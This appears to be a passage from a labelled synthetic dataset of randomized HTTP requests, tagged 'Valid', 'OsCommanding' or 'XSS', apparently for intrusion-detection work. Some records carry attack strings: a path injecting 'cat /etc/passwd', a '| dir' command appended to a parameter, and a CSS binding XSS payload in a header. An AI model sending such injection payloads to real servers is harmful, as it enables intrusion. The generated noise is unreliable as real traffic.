Cache-Control: max-age=585
Client-ip: 117.52.42.62
Cookie: LVkEXltZrh=icEn;ectdztos=xP@fNo-S9l59
Cookie2: $Version="2"
Date: Fri, 21 Sep 07 15:51:41 UTC
ETag: W/"FMNtU8_4mWoZg5hlKWx"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Tue, 11 Jan 05 10:56:13 CET
If-Unmodified-Since: Thu, 06 Mar 08 15:49:51 GMT
If-Match: "6h2fzQolgIA-aa8"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic YW5sbnVCbzpzZWVyN290
Range: 90-,2358-,4145-667
Referer: http://scho.ch/rnTgidas.mp3
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: t5Opha
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: FTP/1.1 236.193.132.53
Transfer-Encoding: oewL
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18496
Start - Id: 15195
class: Valid
GET /yaby9he/Q@I3gE/a4f8bILLjWg49tAC8dYk.shtml?ests3dee=3780 HTTP/1.0
Host: 39.103.157.141
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: 
Accept-Language: cgjtbSs-cfo5i
Cache-Control: max-stale=3
Client-ip: 159.197.180.143
Cookie: tp4dnotutnsaho=8%2Ba2nnrncl;LeVPz%u3=74551
Cookie2: $Version="700"
Date: Sat, 11 Feb 06 08:52:23 GMT
ETag: W/"ZJZkXDbM_a2Izrn0"
Expect: 100-continue
From: ltpredhx@Enoq.be
If-Modified-Since: Fri, 15 Apr 05 06:50:09 UTC
If-Unmodified-Since: Sun, 23 May 04 13:41:16 UTC
If-Match: "DD-7LCzYjtIW-06"
If-None-Match: *
If-Range: Sun, 20 Jan 08 14:26:02 GMT
Max-Forwards: 9
MIME-Version: 3.1
Pragma: eev='uhe'
Proxy-Authorization: Digest nc=33DbDA5b
Authorization: Basic U25waTpwbm9jaQ==
Range: 478892-,53727-
Referer: /T8ae/isfnj.dll
TE: gzip,trailers
Trailer: Upgrade
User-Agent: lunsHiUaohgiolsfdt
UA-CPU: x86
UA-Disp: 450,4767,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: veu/1.2 www.AteDyiL.shtml, 0.2 205.46.47.165
Transfer-Encoding: ueXs; soereh=woSao
Upgrade: oNa/0.0, nsdae/3.3, tlce/5.0, bodb6/8.0
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 01906983974999
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15195
Start - Id: 167
class: Valid
GET /t79etr/s3MaNeGKCbhtGo14dTwK/6py/eqAQXr226QwtO/e8-N85d/FAZ/h5yYdqMKxofWMO.pl?9emdoEuSeisIih=tw3yNmMWldYZ&twosnfdriaNn=933215836&n1gSoth7anylre=43749&7jm8erhgydc=aaus0rc7odriN&libvibw=546hLgeMh&zD.nHWcatyw=%28kq&weiNt=691617485&2aes2pt9M=2585&2_Crmselecto=upotbTsIaae HTTP/1.1
Host: 88.72.38.203:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.4, windows-1257, x-mac-korean, iso-8859-6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 121.142.162.0
Cookie: th=5uacopy5hlTaioj
Cookie2: $Version="671"
Date: Sun, 18 Apr 04 16:03:52 CET
ETag: "f61ret1R3hv18txQ0Z"
Expect: onwo8=ittano
From: Ilbtrg@snmsRsihc.uk
If-Modified-Since: Tue, 13 Nov 07 09:04:01 CET
If-Unmodified-Since: Fri, 03 Dec 04 23:22:51 CET
If-Match: "HV8ecV4xb8LOF@Fkq6c2"
If-None-Match: "4XCA1NJc9e9M9I1Ny"
If-Range: Sun, 31 May 09 10:17:07 UTC
Max-Forwards: 851
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: veEqi eioatnQ=eafazya
Range: -36029,09964-,141-0
Referer: http://L85ueul1.gov/doun/in5uto/eip5e.doc
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 7.2; a6-at; rv:3.2.8) Gecko/10121149
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: ahlz/8.7 213.24.101.92:880, r8amlh/7.5 115.254.97.160
Transfer-Encoding: r3upiC; 5xeora1=bio1w
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 167
Start - Id: 7025
class: Valid
PUT /gomntt7/CWJ9Rtmp4J2g8Qxk/n0/nhMaasmVAEdwuXVwmFFZ/j6FyW7/nrAAwvPfHUpmU8.js? HTTP/1.0
Content-Length: 67
Content-Language: bsu,e,hhho
Content-Encoding: compress
Content-Location: http://www.4eEzseif.com/iuusi/5eau3/pseitOe/reeefs.mdb
Content-MD5: QnRyb21wYWFFZWFlbnlNZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 05:58:32 UTC
Last-Modified: Tue, 10 May 05 13:18:28 CET
Host: www.OntnS4.org
Connection: keep-alive
Accept: audio/x-wav;q=0.2, audio/*;q=0.5, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eC-e, ehlhrE-bhruohe, oc-ns
Cache-Control: no-store
Client-ip: 245.122.180.4
Cookie: Ecws=ce;swtt=gtin'eaI0;nfre=emIswwRl;ieeax7ro2e=8206636
Cookie2: $Version="0"
Date: Sat, 28 Aug 04 23:28:26 UTC
ETag: "esxO4Dm9sC_j@UD5"
Expect: 100-continue
From: tssMn@1oPt.gov
If-Modified-Since: Thu, 04 Mar 10 24:04:46 CET
If-Unmodified-Since: Wed, 15 Dec 04 23:31:04 UTC
If-Match: "o@VcZGok6eZsqLE4O"
If-None-Match: *
If-Range: Sat, 09 Aug 08 01:04:04 GMT
Max-Forwards: 8823
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: Basic cWRvb29hZGw6bmVsUw==
Range: -251792
Referer: /tRei.swf
TE: deflate,gzip
Trailer: Range
User-Agent: Mozilla/9.0 (X11; U; Linux i386 5.7; uc-ae; rv:3.5.5) Gecko/22119616
UA-CPU: Sparc
UA-Disp: 1173,628,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9521x736
Via: 4.1 www.bNrcgw.shtml, HTTP/8.8 www.xdT6.png
Transfer-Encoding: fHels; obso6e=4hjac
Upgrade: lka/1.1, sansgb/6.9, tbztw/9.8
Warning: 310 117.137.73.10 "hth8tnutSeoe1rhmv" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 8626260685
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihoraoa=aUchildt0&boloeg=156&jssmtesy=d_e84Y6hf&Tsxnii=263716&fe=48

End - Id: 7025
Start - Id: 6191
class: Valid
POST /fP/3hNK3u6vbscriptO6.exe? HTTP/1.1
Content-Length: 173
Content-Language: tu,tp8iCz,auaoli0
Content-Encoding: gzip
Content-Location: /stthd/9ni4tg.bin
Content-MD5: a2RnZTJvZ2RlcjQ0dG56Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Jan 07 21:06:18 CET
Last-Modified: Sun, 07 Dec 08 07:01:11 CET
Host: 185.15.115.41
Connection: keep-alive
Accept: application/rtf;q=0.2, application/zip
Accept-Charset: us-ascii;q=0.1, iso-8859-3
Accept-Encoding: gzip;q=0.4, compress, deflate;q=0.1, deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 255.80.64.35
Cookie: u4hnE03e= e?s;r9nytf7nzneyi=OryimJ7
Cookie2: $Version="8"
Date: Tue, 01 Mar 05 08:11:33 GMT
ETag: "t.ZPHU8eCLhiSXi3g"
Expect: 100-continue
From: rt7qioi@lknl.st
If-Modified-Since: Fri, 23 Mar 07 20:55:20 GMT
If-Unmodified-Since: Mon, 28 Jul 08 15:56:17 CET
If-Match: *
If-None-Match: "j9XgIRW_EKuj_K.N.JG"
If-Range: Sat, 23 Jan 10 24:53:16 CET
Max-Forwards: 8
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: scna hsfne=kittdaRt
Authorization: Basic Z3JzaUE6aXJTNHU=
Range: 4-85
Referer: http://hDoeebps.ch/tt2h/dia1/iltzfm5p.tiff
TE: trailers,gzip,gzip
Trailer: Via
User-Agent: dous0hut2o2gsj1aerPl
UA-CPU: x86
UA-Disp: 717,319,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 230x8850
Via: FTP/5.1 208.157.173.156:7714, 4.0 www.rkrnq2d.jpg
Transfer-Encoding: deflate
Upgrade: sds/2.6, greioh/9.0
Warning: 430 226.131.81.63 "0dnenz" "Tue, 26 Sep 06 21:15:47 CET"
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 1402347100773989
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

reiynrl=760&K6iprocessing-instructionK4T=07091&yctrtssttSoach=lqaprocessing-instructionmnA /o1]nb&qASNeXOR=82&ucllq9msOhor=5497&guDtaix2lattf=njnrn&pon3retegt=divdoeefni

End - Id: 6191
Start - Id: 44538
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: www.wSi3u.org:80
Connection: close
Accept: audio/*;q=0.5, audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Cookie: gpGaaiek9iEsyh=aj@Siackwot;sorectu6=oeelike;arlahid=24;rmlikems@95=73045;laLldls=/u>E~an8e 8
Date: Mon, 02 Mar 09 15:45:51 GMT
ETag: W/"QvUfPoXfec5ko_Eqm"
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-None-Match: *
If-Range: "_ed4eX@qdLdBt8K"
Max-Forwards: 2
Pragma: ska='uiOo13Ni'
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM YUVkMGVuMmVzOXJzM2FwdGNtNHU1RFRjZWhwc3QwdGVldDc=
Range: 07390-,-851404
Referer: http://www.rsoporrs.it/sAteI9/s810t.mdb
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: s3@7tKngMH http://www.7rils.de
Via: FTP/6.7 248.191.227.202, euulu/3.2 www.daoi.shtml
Transfer-Encoding: deflate
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44538
Start - Id: 42854
class: OsCommanding
GET /jMLrHmDYzwOmZ29/tT0k245lkr0JX2/lvtesgyokh2iRntnC0/alEladOxrwowonw/Oaccess_logZID93PlU6.gif?ps2e=sspdntrnnwto6p&lduV9ehR=65943422&nTLh9MME=03&ssnluuIR=t55&e7asnc=5897&tns=tewanLkudetn&o8eOebo=4419033&hneldioat=4395&oh8rrghe=19.195.103.123%7C+++dir HTTP/1.1
Host: 170.239.200.131
Connection: close
Accept: image/jpeg;q=0.4, text/*;q=0.9
Accept-Charset: big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=33
Client-ip: 143.230.118.47
Cookie: 4eetU=tontu
Cookie2: $Version="840"
Date: Fri, 10 Jun 05 08:25:13 GMT
ETag: "Hojpf2RJeeu_ocT8l6Gw"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Mon, 27 Mar 06 05:12:29 UTC
If-Match: *
If-None-Match: "_TnDbgtAk8ZJi@yEj"
If-Range: Wed, 11 Jun 08 01:13:43 UTC
Max-Forwards: 5434
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -885,-18051
Referer: http://oeqhci.biz/itEla/lpnat/tHRtteZ/sens5s3.cfm
TE: gzip,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 2.0; j2-ea; rv:1.2.8) Gecko/93554511
UA-CPU: MIPS
UA-Disp: 7817,3346,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.4aina.css, FTP/8.2 www.sh4tee.jpeg, HTTP/9.9 www.asFvet.css
Transfer-Encoding: identity
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42854
Start - Id: 34865
class: Valid
POST /epM1i@IAvQDCOa8nxF/eFEiR/aeilow/a_V_5QimIUMVx6gEj0S5/oI3c57zJZA@/xOM5TU_IR6qBq8bjp.php4? HTTP/1.1
Content-Length: 316
Content-Language: e
Content-Encoding: compress
Content-Location: http://www.vreA.gov/2yfbt.htm
Content-MD5: ZHlyeG5jZWV3emhqc2p0MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Jul 09 01:20:10 UTC
Last-Modified: Sun, 03 Feb 08 10:13:27 CET
Host: 190.38.244.229
Connection: lptto
Accept: */*
Accept-Charset: windows-1257, windows-1255, big5;q=0.4, euc-cn
Accept-Encoding: *;q=0.8
Accept-Language: Ttridsbo-w, akb3drs-4si;q=0.6, d-bnTI;q=0.5, ailen-oycobhos
Cache-Control: min-fresh=77971
Client-ip: 61.49.103.123
Cookie: nzp=omdrcasieorntIum6;bHcindiz9=523
Cookie2: $Version="6"
Date: Thu, 17 Jan 08 16:05:32 GMT
ETag: W/"GWdSysx8IvCsLPPeu"
Expect: 100-continue
From: ssbalhb@aagj.ch
If-Modified-Since: Sat, 22 Dec 07 23:22:54 CET
If-Unmodified-Since: Thu, 03 Jan 08 03:04:56 UTC
If-Match: *
If-None-Match: *
If-Range: "UtA75cib9fS_.BsvRsA"
Max-Forwards: 342
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM a1dwZHVwZW91YWRudGFzczN6dHBBZWJodGVvOWh1b2xocw==
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: http://www.smi3inf.org/wfegt4o2.cgi
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: ckHmP-ug. http://www.notre.org
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-Color: color8
UA-Pixels: 3738x0584
Via: 6.5 185.232.195.233
Transfer-Encoding: Ierag; mc1s=saa1s
Upgrade: prdbih/2.2, bi6b/4.4, hveXe/8.6, oehe5S/1.6, eo8La/9.0
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

mtwbuBecicUEt=51608312&hpaea21nrntLer=283&hZlia5oueeshelo=lacn&EhsvmdmxTpca2qs=sj(sysLhile-I@n&iehtOamea=ydoqu necEa evalnesTl &2c=3129892895&hf9eh=eSr&hnlfisciosegv=cUgey&qsnrhm2eTa=telnetnk2suscriptbni&lriiln=bDK.TS.Qp0&HetWe=pe&WqTscript=05048829&Otdteoyveet=16379259&ryehsnaHMonC=3258305&tIwjG2EtmdL=edqGY0ss

End - Id: 34865
Start - Id: 2526
class: Valid
GET /6OyqI/ctluahgehgn/OD8locationd/sock_streame3h/ntcsteeal91ho/at5r1rtsesthTe7ntea/elkrSc2PJ.03CI4NIlME/hNR6g7O2XX/rve9oncpzvNcxlimhZ4k.php3?Vtedc19p8ehd=15251793&m7rykuuhree=i&dii=Caazs+4%3EdyoW HTTP/1.0
Host: 29.222.110.154
Connection: aeEN9
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, compress;q=0.2, deflate, identity;q=0.3, compress;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 171.191.7.222
Cookie: 0idr4ftn=35;tp7z=tlikehttp;xBO_MrhA0v=DkaefeleabSye;w@MdR0=tmHU1oS0a;sclwa3hebaqmOq=891978;Br0catz=3
Cookie2: $Version="794"
Date: Mon, 31 Mar 08 19:19:18 CET
ETag: "CelH7v9rhJypvTbLpia"
Expect: 100-continue
From: lifcswz@aveP.cz
If-Modified-Since: Mon, 17 May 04 08:55:12 UTC
If-Unmodified-Since: Fri, 06 Apr 07 13:39:29 UTC
If-Match: *
If-None-Match: "CVepwrDBUNQzyoZSt"
If-Range: Sat, 21 Aug 04 06:45:49 GMT
Max-Forwards: 70
MIME-Version: 1.2
Pragma: eMr=E
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: nsrnl h85beeei=gkpla
Range: 32-6,-041504
Referer: http://actrn2.com/nhCJaEn/kp7eo/ezEengeo/oijeta.ace
TE: deflate;q=0.6
Trailer: Date
User-Agent: kohitq
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6834x6538
Via: 0.9 99.201.26.105, FTP/5.9 32.63.218.66, 4Btoee/5.6 www.oliW.js
Transfer-Encoding: em8sr
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 328 www.o0iot.shtml "okhortmuaesoti" 
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2526
Start - Id: 22109
class: Valid
GET /KlibmOdZJCZI.msf?mindnhaS=wLU2bjXmtn&ia95=7094447973&eeegeg3obcneDpw=script&9edch=89795890&ad=9&Uatexlititte=5723&fotn5ybvat8o=cuwuhgb%7C&Rqiiud=6185&nrraohe=d6x&2eiatnttra0z=erEnr&pawinnt1hEpasswd8J9Zu=nsareplaceTyn7wwboot.inii%7E&Tcot8en69=p%40dotes9br&wdsoj=59 HTTP/1.1
Host: www.daltnr.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw;q=0.2, x-mac-arabic;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: f3Vs2esh-r4iolpt;q=0.9, hsip-SOr;q=0.2
Cache-Control: max-age=685
Client-ip: 203.16.208.96
Cookie: SniIeee=12136;oeekq=iframe);1rdn=tdHA6g4GmpS
Cookie2: $Version="979"
Date: Thu, 04 Mar 10 14:05:46 UTC
ETag: ".qLBXoedK-yBA_Z"
Expect: raried
From: cemr@yhuhe3Dw.cz
If-Modified-Since: Wed, 19 Dec 07 10:31:51 UTC
If-Unmodified-Since: Sat, 29 Nov 08 24:28:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest response="2e393a16f1cF1ddcEaF6e4E15f49C06b"
Authorization: Basic aWlvaDowYWRo
Range: 1976-
Referer: /tedat/tlZuaeon/t1llsram.png
TE: trailers,chunked;q=0.0
Trailer: Proxy-Authorization
User-Agent: tloq6Hd http://www.dt66fote.st
UA-CPU: x86
UA-Disp: 5128,861,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8724x0388
Via: 1cvi/1.2 www.t4thi.html, HTTP/0.5 114.109.251.172, 2.2 www.rttia.htm
Transfer-Encoding: driaeT
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 174.83.21.40
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22109
Start - Id: 9510
class: Valid
GET /n8AnlxogeeAba/pceO/dJlCGCTWFK/V55FU605IM/smx./gHpa1.9BA6PXWI-Q/H33jO5xJ78.andM/pLHtMwQ.c2GBtJtrkmFs/eM66OROJBxsb466s.png?jWtbetweenI=9646&5oi7eeu=lp&REhst=ly9gRtn&iebtadaSfcicLoe=sbocatfa%24&dNxiesa0t=9033297503&amtr3bnrtninsj=o2nhzceietfh9t&mxs2nsehtt=iwindow.openddv%3Cede8taupdate HTTP/1.0
Host: www.eno54o.org:4075
Connection: close
Accept: video/quicktime
Accept-Charset: gb2312;q=0.6, windows-1252, windows-1257;q=0.1, euc-kr;q=0.2, us-ascii
Accept-Encoding: compress;q=0.2, compress;q=0.6
Accept-Language: G9-ci;q=0.8, 7as-oehet, Lecc-meroBim;q=0.2, itam-o2;q=0.6, iolaHgj-u;q=0.7
Cache-Control: no-cache
Client-ip: 193.54.140.120
Cookie: MqXPMMwP-1=oypC7ote;easbrb=nepin;8Zt=077;EGP9_K--8=nth<ou3ndreplacese0i;ogehbetr6zhtn=63577
Cookie2: $Version="261"
Date: Thu, 02 Apr 09 24:22:36 UTC
ETag: "l3@N7vATzXIQJKXpkJ6X"
Expect: 100-continue
From: edeOomt@ioOp.com
If-Modified-Since: Sat, 21 Nov 09 05:04:05 GMT
If-Unmodified-Since: Thu, 09 Dec 04 17:42:37 GMT
If-Match: "xSqZKdl6SG_GaqmDm3"
If-None-Match: "uNxmndLnDkj94Mk3iPKo"
If-Range: *
Max-Forwards: 463
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: ytden2 roecoS=lyun
Range: 870431-,61-,-3837
Referer: http://www.eh2k3.com/epny/ssspf/lsossiRe.txt
TE: trailers,gzip
Trailer: Connection
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 7.4; tu-hn; rv:9.4.8) Gecko/93904320
UA-CPU: PowerPC
UA-Disp: 369,697,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 1.7 197.147.174.96, HTTP/4.0 88.1.29.168
Transfer-Encoding: deflate
Upgrade: uaa/5.9, am9/8.3, ioodjc/7.1, sCt4/8.7, azO/3.1
Warning: 351 101.147.244.59:296 "ohtht" "Mon, 14 Nov 05 24:13:31 GMT"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 60012651763623310
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9510
Start - Id: 46579
class: XSS
GET /pn3K9wKx/gY6XJbF3rBBtZbBx/ihavingestyle5Xhttp4Gfzfqopen/h@5tgaUbCUs6QgOKe1_/li2AycMYH/ztY8GS/tD0x2mMQIhVCI6hh/mvbscriptCLvbscriptw5Zvy1Es.msf?rtfams=1727&eerMRlEalc=stdetthrw%3BQrst&aeml=69&5tntcyawTys=%7Cossezlne3Ajoi9script%3DQ&e0exnaacHooscG=%7Eto0oae4aah8tshutdownn%7E&ijeir=mqITNsZBJZ&kFwq_=ltwinclude HTTP/1.0
Host: 156.252.19.43
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-kr
Accept-Encoding: <div     style=  "  binding:   url([http://www.oltrti.com/script/sTtve.mspx]);     ">
Accept-Language: 1-pAujl
Cache-Control: max-stale
Client-ip: 76.176.140.59
Cookie: bcm6rka=a0yzOO_do8aP;D6aSYV=a;rolmnit9h=rsafre@t;4m=96;xcFNor5vO=Egbfhtnd
Cookie2: $Version="22"
Date: Mon, 15 Jan 07 11:48:10 UTC
ETag: W/"ggPvguC2iGHQlzQ"
Expect: Yimuw
If-Modified-Since: Wed, 21 Jan 09 19:24:02 GMT
If-Unmodified-Since: Tue, 05 Apr 05 06:18:41 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Feb 09 24:24:03 UTC
Max-Forwards: 46
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM cjdsdGM4YWNpdGJzb2UzaWhuY2g0dG9naXRiZG9laWZyOWlo
Authorization: Digest cnonce="nf9b"
Range: 76-918888
Referer: /ntl7p/tsunl.sh
TE: trailers,deflate;q=0.4
Trailer: Expect
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 6.3; ro-si; rv:6.8.5) Gecko/17945957
UA-CPU: PowerPC
UA-Disp: 676,907,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5605x1554
Via: 5.7 65.2.76.6, 8.8 133.15.223.108, 8.1 www.6wpbn.js
Transfer-Encoding: uiru; ntn0=t3Auah8s
Upgrade: teocua/2.1, aao5/0.7, onnw/4.6, 3ioRA/4.3, tmed0W/6.5
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 23.216.88.9
X-Serial-Number: 34246962990912
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46579
Start - Id: 15978
class: Valid
GET /t3eD/ahkbichdsnenitynssx/gT0n4e0gn-T5yT/aoc/w47GctfzM/duyr4AKi6evt/saacwoteie.cfm?Enanu2mnsrismp=32107&7ElikeobjectB-6w1=rRSAbobYeM&cre=ukay&c-HZautoexec=eZdNGBnSTF&SEt=0&tcnoHwcOzy=%7Cs+e&e0ni=9&ro=599&bCsApaj=n2ots HTTP/1.0
Host: 93.40.121.8
Connection: keep-alive
Accept: application/zip;q=0.2, video/quicktime, application/zip
Accept-Charset: koi8, x-mac-chinesesimp;q=0.8, x-mac-icelandic;q=0.4, iso-8859-7;q=0.4, x-mac-arabic
Accept-Encoding: deflate;q=0.5, identity;q=0.5, deflate, compress;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 31.122.98.168
Cookie: YVscopt=d7B;6eaGeutotleea=o7kwzh
Cookie2: $Version="99"
Date: Mon, 18 Jun 07 20:14:34 UTC
ETag: ".Bv@UTeq1ecGMZfx"
Expect: 100-continue
From: ltsto@Ialfs84IY.net
If-Modified-Since: Fri, 10 Dec 04 22:58:44 GMT
If-Unmodified-Since: Fri, 26 Mar 04 06:20:08 UTC
If-Match: "eMrOnO_EVz1G2Eht"
If-None-Match: *
If-Range: Tue, 21 Mar 06 16:50:50 GMT
Max-Forwards: 6
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: NTLM bXNycnM3bHd0b2hubmFuZXlGajM0T2duTGUyOHRjYXlvaXJmZGVaSXRxZGZ6dWJh
Range: 08-06,-75180
Referer: /ebunae/pscr/aozi1gni/9aaSnh.exe
TE: chunked;q=0.8,chunked;q=0.5,chunked
Trailer: User-Agent
User-Agent: eROyT_5Jl http://www.snoD.biz
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1814x7324
Via: HTTP/6.2 113.49.10.232, 5.3 218.180.81.8, 5.1 198.190.192.0
Transfer-Encoding: identity
Upgrade: draal1/9.2, 8stse/6.9, tvz7o/8.5
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 167.197.130.101
X-Serial-Number: 606819653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15978
Start - Id: 13476
class: Valid
GET /AGN/jEhET/thaeGUhQ-gGWAjv9/niErpitnrl/e49ybfsmhVR/p8f/n.@D1L.gif?Gy5aHstyle_gFwindow.opent=tlsmGzl&Kidt5o=916&tmprd8JUklsd=v9h&eeoseni=7736402&hsa8NAnssr=xj&ftdwwtal=7597907&arb=116&omTn=msevnia4&ecneadyi=4291&6jaoEw=eA9E&ah=14 HTTP/1.0
Host: 225.71.222.60
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=524
Client-ip: 168.3.160.150
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Tue, 13 Jun 06 02:02:15 UTC
ETag: W/"GmUUIhFbJ@1bmc5s"
Expect: tpelr=naIii
From: iaeuease@fasecroo.st
If-Modified-Since: Thu, 08 Jan 04 07:24:29 GMT
If-Unmodified-Since: Sun, 20 Feb 05 08:36:10 CET
If-Match: "T_NQzxfyTr27kEbU8"
If-None-Match: "KL4B1_4k9tWDGyW_lttt"
If-Range: *
Max-Forwards: 050
MIME-Version: 4.6
Pragma: iz9iee=msaz
Proxy-Authorization: Basic cmFkMmE6cmVmT2RybQ==
Authorization: Digest opaque="bln1e8gm"
Range: 00941-
Referer: http://Mp6tUt.org/hl95/eOtna/qneNhtdf.js
TE: gzip,deflate
Trailer: TE
User-Agent: tsao/9.6.9
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 801x0437
Via: FTP/7.9 238.182.2.37, HTTP/6.3 232.17.196.131
